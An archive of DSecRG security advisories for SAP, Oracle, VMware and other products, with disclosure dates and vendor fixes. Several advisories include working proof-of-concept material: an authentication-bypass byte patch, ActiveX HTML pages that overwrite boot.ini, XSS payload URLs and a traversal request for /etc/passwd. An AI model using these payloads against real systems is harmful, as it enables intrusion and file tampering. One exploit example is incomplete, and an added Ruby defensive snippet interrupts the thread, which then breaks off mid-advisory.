0x0010   00 6E 00 00 00 00 40 06-7C 88 7F 00 00 01 7F 00   .n@.|?....
0x0020   00 01 0B 27 0B B8 13 03-00 00 00 00 00 00 50 00   ...'.?P.
0x0030   40 00 00 00 00 00 00 00-00 09 00 14 00 46 00 00   @F..
0x0040   00 18 00 01 00 00 00 00-00 00 00 00 00 00 00 00   
0x0050   00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 73   ..Us
0x0060   65 72 69 64 20 69 73 20-6E 6F 77 20 54 45 53 54   erid is now TEST
0x0070   32 2E 20 28 37 30 38 29-00 00 00 00   2. (708)

Example of attack:

Patch of %OpenEdge%\bin\prow32.dll (for version 10.2A)

Begin address: 0x020065
- 0f85ce02
+ 909090909090

After that, run DataAdministration (%OpenEdge%\bin\prowin32.exe) and try to 
log in to the RDBMS with any UserID and without a password. 
The application shows an error message box but allows logging in to the RDBMS 
with the chosen UserID. If the chosen UserID has Security Administrator 
privileges, the attacker gets those privileges. By default, all users in 
OpenEdge RDBMS have Security Administrator privileges.

Fix Information
***
The only possible fix is to use Windows authentication instead of the 
proprietary one.


References
*

http://dsecrg.com/content/vul/edit.php?id=308

[DSECRG-00142] SAP Crystal Reports 2008 - actionNavjsp_xss

2011-01-25 Thread Alexandr Polyakov

  XSS vulnerability found in SAP Crystal Report Server 2008 

Application: SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs: Linked XSS Vulnerability 
Exploits: YES
Reported: 04.03.2010
Vendor response:  05.03.2010
Date of SAPNOTE Published: 8.10.2010
Date of Public Advisory: 14.01.2011
Authors: Dmitry Chastuhin
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)


Description

SAP Crystal Report Server 2008 contains a variety of features with which users 
can manage and share
interactive reports and dashboards, as well as provide access to them via the 
Internet.

Details
**
Multiple XSS vulnerabilities were found in the InfoView module.
1. Vulnerability discovered in the JSP page actionNav.jsp of the InfoView 
module, located at http://sap_server_adr:8080/InfoViewApp/jsp/common/actionNav.faces.
Vulnerable parameter: actId.
Any user can craft a malicious link and steal a user's or Administrator's cookie.

2. Vulnerability discovered in the JSP page error.jsp of the InfoView module, 
located at http://sap_server_adr:8080/InfoViewApp/jsp/common/error.jsp
Vulnerable parameter: backUrl.
Any user can craft a malicious link and steal a user's or Administrator's cookie.

3. Vulnerability discovered in the JSP page logon.jsp of the InfoView module, 
located at http://sap_server_adr:8080/InfoViewApp/logon.jsp
Vulnerable parameter: logonAction.
Any user can craft a malicious link and steal a user's or Administrator's cookie.

References
**

http://dsecrg.com/pages/vul/show.php?id=301
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1458310




Fix Information
***

Solution to this issue is given in the 1458310 security note.












[DSECRG-09-040] SAP Netweaver wsnavigator XSS Security Vulnerability

2010-07-23 Thread Alexandr Polyakov

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-040


Application:SAP Netweaver   
Versions Affected:  Version 6.4 - 7.0 
Vendor URL: http://SAP.com
Bugs:   XSS
Exploits:   YES
Reported:   26.05.2009
Vendor response:27.05.2009
Date of Public Advisory:13.07.2010
CVE-number:
Author: Alexandr Polyakov
Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)
In addition by another security researcher at 
the same time.


Description
***

The SAP NetWeaver system has a linked XSS security vulnerability in the 
wsnavigator component.



Details
***

http://dsecrg.com/pages/vul/show.php?id=140


Example
***


https://server/wsnavigator/jsps/explorer/help.jsp?title=Test;<script>alert('XSS')</script>


References
**

http://dsecrg.com/pages/vul/show.php?id=140
https://service.sap.com/sap/support/notes/1169248



Fix Information
***


A solution for this issue is given by SAP in security note 1169248


About
*

Digital Security is one of the leading IT security companies in CEMEA,
providing information security consulting, audit and penetration
testing services, ERP and SAP security assessment, certification for ISO/IEC 
27001:2005 and PCI DSS and PA DSS standards.
Digital Security Research Group focuses on enterprise application (ERP) and 
database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.

Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com 












[DSecRG-09-053] VMware Remote Console - format string

2010-04-15 Thread Alexandr Polyakov

Digital Security Research Group [DSecRG] Advisory   DSECRG-09-053


Application:VMware Remote Console
Version:e.x.p build-158248
Vendor URL: http://vmware.com
Bugs:   Format String Vulnerabilities
Exploits:   YES (PoC)
Reported:   07.08.2009
Vendor response:13.08.2009
Date of Public Advisory:09.04.2010
CVE:CVE-2009-3732
VSA:VMSA-2010-0007
Authors:Alexey Sintsov of 
Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)

Description


The VMware Remote Console Plug-in can be installed from the web
interface of VMware vSphere. This software consists of ActiveX
objects and executable files for the remote console of a guest OS. 
VMrc is vulnerable to format string attacks. Exploitation of this issue 
may lead to arbitrary code execution on the system where VMrc is installed.


Details
***
Details on official advisory  http://dsecrg.com/pages/vul/show.php?id=153

References
**

http://dsecrg.com/pages/vul/show.php?id=153
http://lists.vmware.com/pipermail/security-announce/2010/90.html

About
*

Digital Security is a leading IT security company in Russia, 
providing information security consulting, audit and penetration
testing services, risk analysis and ISMS-related services and 
certification for ISO/IEC 27001:2005, PCI DSS and PA-DSS standards.
Digital Security Research Group focuses on web application and database
security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.


Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com 










[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability

2010-04-15 Thread Alexandr Polyakov


Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-049


Application: IBM BladeCenter Management Module
Versions Affected:   before BPET50G 
Vendor URL:  http://www-03.ibm.com/systems/bladecenter/
Bug: DoS
Exploits:YES
Reported:24.07.2009
Vendor response: 26.07.2009
Date of Public Advisory: 15.04.2010
Solution:YES
Author:  Alexey Sintsov 
 of Digital Security Research Group [DSecRG]


Description
***

The BladeCenter management module is a hot-swappable hardware device plugged 
into the BladeCenter chassis management bay. The management module functions as 
a system-management processor (service processor) and keyboard, video, and 
mouse (KVM) multiplexor for blade servers. This device can be remotely rebooted.

Details
***

Details in official Advisory http://dsecrg.com/pages/vul/show.php?id=149

Solution


The issue has been fixed in AMM firmware version bpet50g and later.

References
*

http://dsecrg.com/pages/vul/show.php?id=149
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5083945brandind=520

About
*

Digital Security is a leading IT security company in Russia,
providing information security consulting, audit and penetration
testing services, risk analysis and ISMS-related services and
certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.
Digital Security Research Group focuses on web application and database
security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 





[DSECRG-09-064] SAP GUI - Insecure method, code execution

2010-03-23 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-064

Application:SAP GUI 
Versions Affected:  SAP GUI (SAP GUI 7.1)
Vendor URL: http://SAP.com
Bugs:   Insecure method. Code Execution.
Exploits:   YES
Reported:   16.10.2009
Vendor response:27.10.2009
Date of Public Advisory:23.03.2010
Author: Alexey Sintsov
from Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)
Description
***

An insecure method was found in the SAPBExCommonResources (class BExGlobal) 
ActiveX control component, which is part of SAP GUI.


Details
***
Details can be found at http://dsecrg.com/pages/vul/show.php?id=164

Fix Information
***
All patches have been available since December via note 1407285.

References
**
http://dsecrg.com/pages/vul/show.php?id=164
https://service.sap.com/sap/support/notes/1407285




About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com












Polyakov Alexandr. PCI QSA.
Head of security audit department
Head of Digital Security Research Group
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  
www.dsec.ru
www.dsecrg.com
www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---  



[DSECRG-09-039] Symantec Antivirus 10.0 ActiveX - buffer Overflow.

2010-02-23 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-039

Application:             Symantec Antivirus Client Proxy
Versions Affected:       Version 10
Vendor URL:              http://symantec.com
Bugs:                    Buffer Overflow
Exploits:                POC
Reported:                04.05.2009
Vendor response:         07.05.2009
Date of Public Advisory: 17.02.2010
CVE-number:              CVE-2010-0108
Author:                  Alexander Polyakov
                         Digital Security Research Group [DSecRG]
                         (research [at] dsecrg [dot] com)

Description
***

Symantec Antivirus Client Proxy (CLIproxy.dll) contains an ActiveX component which 
is vulnerable to a buffer overflow attack.


Details
***
http://dsecrg.com/pages/vul/show.php?id=139

Fix Information
***

Symantec product engineers have released a fix for this issue in the MR9 
update. Symantec recommends all customers apply the latest available update to 
protect against threats of this nature. 
Symantec is not aware of any exploitation of or adverse customer impact from 
these issues.


References
**

Symantec would like to thank Alexander Polyakov from DSecRG for reporting these 
issues and coordinating with us while Symantec resolved them.

http://dsecrg.com/pages/vul/show.php?id=139

http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2010&suid=20100217_02




About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com











[DSECRG-09-065] TVUPlayer PlayerOcx.ocx ActiveX - Insecure method

2010-02-08 Thread Alexandr Polyakov
The ActiveX component contains an insecure method that can overwrite any file in 
the system.

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-065


Application:             TVUPlayer
Versions Affected:       Tested on v2.4.9beta1[build1797]
Vendor URL:              www.tvunetworks.com
Bugs:                    insecure method, File overwriting
Exploits:                YES
Reported:                25.11.2009
Second report:           11.01.2010
Vendor response:         none
Date of Public Advisory: 03.02.2010
CVE-number:
Author:                  Evdokimov Dmitriy
                         Digital Security Research Group [DSecRG]
                         (research [at] dsecrg [dot] com)

Description
***

TVUPlayer contains the ActiveX component PlayerOcx (file PlayerOcx.ocx), Lib GUID: 
{18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8}, which contains an insecure method that can 
overwrite any file in the system.

Details
***
Details can be found in the official advisory:
http://dsecrg.com/pages/vul/show.php?id=165

Fix Information
***

There is no official fix from the vendor because the vendor did not respond to
either of the two reports.
As an alternative, the user can set the kill bit on this component.

References
**

http://dsecrg.com/pages/vul/show.php?id=165

About
*

Digital Security is one of the leading IT security companies in CEMEA, 
providing information security consulting, audit and penetration testing 
services, risk analysis and ISMS-related services and certification for ISO/IEC 
27001:2005 and PCI DSS standards. Digital Security Research Group focuses on 
application and database security problems with vulnerability reports, 
advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com








[DSECRG-09-011] HP StorageWorks 1_8 G2 Tape Autoloader - privilege escalation DOS

2010-02-03 Thread Alexandr Polyakov

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-011


Application:             HP StorageWorks 1/8 G2 Tape Autoloader
Versions Affected:       firmware v 2.30 and earlier
Vendor URL:              http://hp.com/
Bug:                     Privilege escalation
Exploits:                YES
Reported:                30.09.2008
Vendor Response:         30.09.2008
Date of Public Advisory: 10.01.2010
Solution:                yes
CVE:                     CVE-2009-2680
CVSS 2.0:                8.5
Author:                  Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)



Description
***
A vulnerability was found in the web administration interface of the HP 
StorageWorks 1/8 G2 Tape Autoloader device.
A default unprivileged user can escalate privileges to administrator.

Details
***
http://dsecrg.com/pages/vul/show.php?id=111

About
*

Digital Security is one of the leading IT security companies in CEMEA, 
providing information security consulting, audit and penetration testing 
services, risk analysis and ISMS-related services and certification for ISO/IEC 
27001:2005 and PCI DSS standards. Digital Security Research Group focuses on 
web application and database security problems with vulnerability reports, 
advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 








(edited) [DSECRG-09-044] SAP GUI 7.1 Insecure Methods

2009-09-28 Thread Alexandr Polyakov

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-044


Application:             EnjoySAP, SAP GUI for Windows 6.4 and 7.1
Versions Affected:       Tested on 7100.2.7.1038 PL 7
Vendor URL:              http://SAP.com
Bugs:                    insecure method, File overwriting
Exploits:                YES
Reported:                02.07.2009
Vendor response:         02.07.2009
Date of Public Advisory: 22 Sept
CVE-number:
Author:                  Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)



Description
***

SAP GUI for Windows 7.1 and 6.4 contains the ActiveX component EAI WebViewer3D (file 
WebViewer3D.dll), Lib GUID: {AFBBE070-7340-11d2-AA6B-00E02924C34E}, which contains 
an insecure method that can overwrite any file in the system.

Details
***

An attacker can construct an HTML page which calls one of the vulnerable functions 
of the ActiveX component EAI WebViewer3D, such as:

1) SaveToSessionFile
2) SaveViewToSessionFile



Example1:

<HTML>
<BODY>
 <object id="ctrl" classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveToSessionFile(File)
 }
</SCRIPT>
<input language="JavaScript" onclick="Do_1t()" type="button" value="P0c">
</BODY>
</HTML>


Example2:

<HTML>
<BODY>
 <object id="ctrl" classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveViewToSessionFile(File)
 }
</SCRIPT>
<input language="JavaScript" onclick="Do_1t()" type="button" value="P0c">
</BODY>
</HTML>




For example, we can overwrite the boot.ini file or sapgui.ini, which contains all 
connections to SAP servers.


Fix Information
***



About
*

Digital Security is one of the leading IT security companies in CEMEA, 
providing information security consulting, audit and penetration testing 
services, risk analysis and ISMS-related services and certification for ISO/IEC 
27001:2005 and PCI DSS standards. Digital Security Research Group focuses on 
application and database security problems with vulnerability reports, 
advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com









[DSECRG-09-043] SAP GUI 7.1 Insecure Method

2009-09-28 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-043


Application:             EAI WebViewer2D (EnjoySAP, SAP GUI for Windows
                         6.4 and 7.1)
Versions Affected:       Tested on 7100.2.7.1038 PL 7
Vendor URL:              http://SAP.com
Bugs:                    insecure method, File overwriting
Exploits:                YES
Reported:                02.07.2009
Vendor response:         02.07.2009
Date of Public Advisory: 28.09.2009
CVE-number:
Author:                  Alexandr Polyakov
                         Digital Security Research Group [DSecRG]
                         (research [at] dsecrg [dot] com)



Description
***

SAP GUI for Windows 7.1 and 6.4 contains the ActiveX component EAI WebViewer2D (file 
WebViewer2D.dll), Lib GUID: {A76CEBEE-7364-11D2-AA6B-00E02924C34E}, which contains 
an insecure method that can overwrite any file in the system.

Details
***

An attacker can construct an HTML page which calls the vulnerable function 
SaveToSessionFile of the ActiveX component EAI WebViewer2D.



Example1:

<HTML>
<BODY>
 <object id="ctrl" classid="clsid:{A76CEBEE-7364-11D2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveToSessionFile(File)
 }
</SCRIPT>
<input language="JavaScript" onclick="Do_1t()" type="button" value="P0c">
</BODY>
</HTML>



For example, we can overwrite the boot.ini file or sapgui.ini, which contains all 
connections to SAP servers.


Fix Information
***
The security issue is addressed with SAP note 1372153.

The methods given in the message have recently been changed to return 
immediately and do nothing.

References
**

http://dsecrg.com/pages/vul/show.php?id=143
https://service.sap.com/sap/support/notes/1372153


About
*

Digital Security is one of the leading IT security companies in CEMEA, 
providing information security consulting, audit and penetration testing 
services, risk analysis and ISMS-related services and certification for ISO/IEC 
27001:2005 and PCI DSS standards. Digital Security Research Group focuses on 
application and database security problems with vulnerability reports, 
advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com














[DSECRG-09-033] SAP Netweaver UDDI - XSS Security Vulnerability

2009-08-12 Thread Alexandr Polyakov
http://www.dsecrg.com/pages/vul/show.php?id=133

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-033


Application:             SAP NetWeaver Application Server (Java)
Versions Affected:       Version 7.0
Vendor URL:              http://SAP.com
Bugs:                    XSS
Exploits:                YES
Reported:                18.03.2009
Vendor response:         19.03.2009
Date of Public Advisory: 11.08.2009
CVE-number:
Author:                  Alexander Polyakov
                         Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)

Description
***
The SAP NetWeaver Application Server (Java) has a linked XSS security 
vulnerability in the UDDI client.


Details
***

Linked XSS vulnerability in the UDDI client.

Vulnerable page: /uddiclient/process

Vulnerable field: TModel Key


Example
***

aaimg/src=javascript:alert('dsecrg xss')


Fix Information
***
The issue has been solved. See SAP note 1322098.


References:
***
SAP note 1322098
https://service.sap.com/sap/support/notes/1322098

DSecRG-09-033
http://www.dsecrg.com/pages/vul/show.php?id=133


About
*
Digital Security is one of the leading IT security companies in CEMEA, 
providing information security consulting, audit and penetration testing 
services, risk analysis and ISMS-related services and certification for ISO/IEC 
27001:2005 and PCI DSS standards. Digital Security Research Group focuses on 
application and database security problems with vulnerability reports, 
advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 


















[DSECRG-09-015] SAP GUI 6.4 Buffer Overflow vulnerability

2009-06-08 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory  #DSECRG-09-015

Original Advisory:   http://dsecrg.com/pages/vul/show.php?id=115


Application:             SAP GUI for Windows, EnjoySAP
Versions Affected:       Version 6.4
Vendor URL:              http://SAP.com
Bugs:                    Buffer Overflow
Exploits:                YES
Reported:                13.11.2008
Vendor response:         17.11.2008
Date of Public Advisory: 08.06.2009
CVE-number:
Author:                  Alexander Polyakov
                         Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)



Description
***

SAP GUI for Windows version 6.4 contains the ActiveX component SAPIrRfc, which is 
vulnerable to a buffer overflow attack.

file = sapirrfc.dll
GUID = F6908F83-ADA6-11D0-87AA-00AA00198702


Details
***

An attacker can construct an HTML page which will call the vulnerable function 
Accept of the ActiveX object SAPIrRfc with a long parameter.
When a user opens this page, either a DoS (Example 1) or full remote control of 
the target system (Example 2, which executes calc.exe, is available by request) 
will occur.



Example1:
*


<html>
<object classid='clsid:77F12F8A-F117-11D0-8CF1-00A0C91D9D87' id='target' />
<script>

arg1=

target.Accept arg1

</script>
</html>



Fix Information
***
The issue has been solved. See SAP note 1286637.



References:
***
SAP note 1286637

https://service.sap.com/sap/support/notes/1286637
http://dsecrg.com/pages/vul/show.php?id=115




About
*

Digital Security is one of the leading IT security companies in CEMEA, 
providing information security consulting, audit and penetration testing 
services, risk analysis and ISMS-related services and certification for ISO/IEC 
27001:2005 and PCI DSS standards. Digital Security Research Group focuses on 
application and database security problems with vulnerability reports, 
advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com














[DSECRG-09-016] SAP SAPDB Multiple XSS

2009-03-31 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-016
!!! original advisory !!!
http://dsecrg.com/pages/vul/DSECRG-09-016.html

Application:             SAPDB
Versions Affected:       Latest
Vendor URL:              http://SAP.com
Bugs:                    XSS
Exploits:                YES
Reported:                20.11.2008
Vendor response:         20.11.2008
Date of Public Advisory: 31.03.2009
CVE-number:
Author:                  Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)



Description
***

The SAP MaxDB Web Database engine, which listens on port   , has a linked XSS 
security vulnerability.



Details
***


Linked XSS vulnerability found in the script webdbm.

Vulnerable parameters are:

Server
Database
User

An attacker can inject XSS into these parameters and steal the administrator's 
cookie.
Alternatively, he can make a fake login page by injecting a script that changes 
the login page and sends passwords to the attacker when a user tries to log on.



Example:
***

http://[server]:/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=[XSS]
http://[server]:/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&User=[XSS]
http://[server]:/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS]



Solution
***

The responsible development unit said that webdbm is outdated and that customers 
should uninstall it and use the Database Studio instead.
See SAP note 1281820.


References:
***
SAP note 1281820.


About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru










Re[2]: [DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability

2009-02-27 Thread Alexandr Polyakov
Hello, Vladimir.

You wrote on 26 February 2009, 21:46:28:

> Dear Digital Security Research Group,

> --Thursday, February 26, 2009, 7:40:50 PM, you wrote to
> bugtraq@securityfocus.com:

> DSRG> Application:   APC PowerChute Network Shutdown's Web Interface
> DSRG> Vendor URL:    http://www.apc.com/
> DSRG> Bug:           XSS/Response Splitting

> DSRG> Solution:      Use Firewall

> Just wonder: how can a firewall protect against XSS/response splitting?


This solution was taken from the vendor's advice.









Oracle CPU Jan 2009 Advisories.

2009-01-14 Thread Alexandr Polyakov
Advisories for the Oracle CPU January 2009 vulnerabilities are attached.





Digital Security Research Group [DSecRG] Advisory#DSECRG-09-001



Application:             Oracle Application Server (SOA)
Versions Affected:       Oracle Application Server (SOA) version 10.1.3.1.0
Vendor URL:              http://www.oracle.com
Bugs:                    XSS
Exploits:                YES
Reported:                10.01.2008
Vendor response:         11.01.2008
Date of Public Advisory: 13.01.2009
CVE:                     CVE-2008-4014
Description:             XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP
Author:                  Alexandr Polyakov
                         Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)


Description
***

A linked XSS vulnerability was found in the BPEL module of Oracle Application 
Server (Oracle SOA Suite).



Details
***


A linked XSS vulnerability was found in the BPEL module. In the page 
BPELConsole/default/activities.jsp an attacker can inject XSS by appending it 
to the URL.




Example
***


http://[localhost]:/BPELConsole/default/activities.jsp?'<script>alert('DSEC_XSS')</script>=DSecRG



The attacker must send the injected link to an administrator to get the 
administrator's cookie.


Code with injected XSS:

</th>
<th id="activityLabel" class="ListHeader" align="left" nowrap>
<a href='activities.jsp?'<script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label' class="HeaderLink">
Activity Label
</a>
</th>

---


Fix Information
***

Information was published in CPU January 2009.
All customers can download the CPU patches by following the instructions at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 



Credits
***
Oracle gave credit to Alexander Polyakov from the Digital Security company in 
CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
 




About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru 
http://www.dsec.ru







Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-002


Application:             Oracle BEA Weblogic 10
Versions Affected:       Oracle BEA Weblogic 10
Vendor URL:              http://oracle.com
Bugs:                    Multiple XSS Vulnerabilities in samples
Exploits:                YES
Reported:                16.07.2008
Vendor response:         18.07.2008
Last response:           30.10.2008
Description:             reviewService sample of WebLogic Server.
Date of Public Advisory: 13.01.2009
Authors:                 Alexandr Polyakov
                         Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)


Description
***


Multiple XSS vulnerabilities were found in the Oracle BEA Weblogic Server samples, 
version 10.2 and latest.



Details
***

Vulnerabilities were found in the reviewService sample of Weblogic Server.

1. Linked XSS found in the createArtist_service.jsp page. Vulnerable parameter: 
name


Example
***
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>


2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter: title


Example
***
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>


3

[DSECRG-08-028] File read in Velocity web-server

2008-07-16 Thread Alexandr Polyakov


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-028


Application:             Velocity web-server (a part of Velocity Security
                         Management System)
Versions Affected:       Old version 1.0
Vendor URL:              http://hirschelectronics.com
Bugs:                    Directory traversal File Download
Exploits:                YES
Reported:                03.03.2008
Second report:           14.03.2008
Vendor response:         14.03.2008
Solution:                No updates for this Version. Download new version.
Date of Public Advisory: 16.07.2008
Authors:                 Digital Security Research Group [DSecRG]


Description
***

The Velocity web-server has a critical directory traversal vulnerability.


Details
***



A directory traversal vulnerability was found in the Velocity web-server.
An attacker can exploit this by sending a URL containing directory traversal 
sequences.




Example:



http://[server]:[port]/../../../../../../../../../../../../../etc/passwd





Fix Information
***


Version 1.0 is very old and does not have updates. If you have this
version, please download the latest version from http://hirschelectronics.com





About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)













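An added example, not code from any advisory in this thread nor from the Velocity or WEBrick projects: a document-root confinement check in Ruby that refuses the "../" traversal shown for the Velocity web-server above and, going beyond that advisory, the two WEBrick variants described in DSECRG-08-018 further down (an encoded backslash "..%5c" accepted as a path separator, and case-insensitive matching of the :NondisclosureName patterns). The SafeStatic module, its method names and the /srv/www root are assumptions made for this example.

```ruby
require 'pathname'

# Added example (not from the advisories): confine a requested path to a
# document root. Handles "../", an encoded backslash "..%5c" (accepted as a
# separator on Windows) and case-insensitive matches of hidden-file patterns
# (the :NondisclosureName bypass on NTFS/HFS). Names are assumptions.
module SafeStatic
  # WEBrick's default :NondisclosureName patterns, as quoted in DSECRG-08-018.
  DEFAULT_NONDISCLOSURE = ['.ht*', '*~'].freeze

  # One pass of percent-decoding ("%5c" -> "\", "%2f" -> "/"), done on the raw
  # bytes so high-bit escapes cannot raise an encoding error. A doubly encoded
  # "%255c" decodes to the literal text "%5c", which is then just an odd file
  # name and not a separator, so a single pass is deliberate.
  def self.percent_decode(str)
    str.b.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
       .force_encoding(Encoding::UTF_8)
  end

  # Split the path on "/" AND "\" (Windows accepts both) and resolve "." and
  # "..". Returns nil as soon as ".." would climb above the document root,
  # which is exactly what the "../../../" and "..%5c" requests rely on.
  def self.canonical_segments(request_path)
    path_only = request_path.split('?', 2).first.to_s # drop any query string
    segments = []
    percent_decode(path_only).split(%r{[/\\]}).each do |seg|
      case seg
      when '', '.'
        next
      when '..'
        return nil if segments.empty?
        segments.pop
      else
        segments << seg
      end
    end
    segments
  end

  # True if any segment matches a non-disclosure pattern. FNM_CASEFOLD makes
  # ".HTPASSWD" match ".ht*", closing the case-insensitive-filesystem bypass.
  def self.nondisclosed?(segments, patterns = DEFAULT_NONDISCLOSURE)
    segments.any? do |seg|
      patterns.any? { |pat| File.fnmatch(pat, seg, File::FNM_CASEFOLD) }
    end
  end

  # Map a request path to an absolute file path under root, or return nil when
  # the request must be refused (traversal, hidden file, or a result that is
  # not inside root once Pathname has expanded it).
  def self.resolve(root, request_path, patterns: DEFAULT_NONDISCLOSURE)
    segments = canonical_segments(request_path)
    return nil if segments.nil? || nondisclosed?(segments, patterns)

    root_path = Pathname.new(root).expand_path
    target = root_path.join(*segments).expand_path
    prefix = root_path.to_s.end_with?('/') ? root_path.to_s : "#{root_path}/"
    # Second, independent containment check: the segment-level resolution above
    # and Pathname's own expansion must agree before anything is served.
    return nil unless target == root_path || target.to_s.start_with?(prefix)

    target.to_s
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed requests modelled on the examples in the advisories.
  root = '/srv/www'
  [
    '/index.html',
    '/../../../../../../../../../../../../../etc/passwd',
    '/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini',
    '/.HTPASSWD',
    '/notes/todo.txt~'
  ].each do |req|
    puts format('%-62s -> %s', req, SafeStatic.resolve(root, req) || 'REFUSED')
  end
end
```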



[DSECRG-08-018] Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory traversal file Download Vulnerability

2008-03-06 Thread Alexandr Polyakov


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-018


Application:             Ruby 1.8.6 (WEBrick Web server Toolkit and
                         applications that use WEBrick, like Metasploit 3.1)
Versions Affected:       Ruby
